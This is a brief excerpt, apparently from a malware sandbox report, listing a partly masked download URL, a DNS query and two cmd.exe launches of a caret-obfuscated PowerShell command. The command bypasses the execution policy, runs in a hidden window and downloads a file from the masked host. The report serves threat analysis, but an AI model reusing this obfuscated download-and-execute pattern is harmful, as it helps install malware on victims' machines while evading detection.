Technical Information
- http://ar####ectureky.bid/user.php?f=##### as %appdata%.exe
- DNS ASK ar####ectureky.bid
- '<SYSTEM32>\cmd.exe' /c Pow^eRs^helL.e^Xe^ -^ex^ec^U^tiO^nP^OL^Ic^Y^ ^BY^pass ^-^n^O^P^ROF^Ile -^wiNdOw^s^tyLe hIdd^e^n^ (^new-^obJ^ect ^s^Ys^t^em.Ne^t.^w^eBcli^en^t)^.d^owNlOa^dFIle('http://ar####ect...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c Pow^eRs^helL.e^Xe^ -^ex^ec^U^tiO^nP^OL^Ic^Y^ ^BY^pass ^-^n^O^P^ROF^Ile -^wiNdOw^s^tyLe hIdd^e^n^ (^new-^obJ^ect ^s^Ys^t^em.Ne^t.^w^eBcli^en^t)^.d^owNlOa^dFIle('http://ar####ect...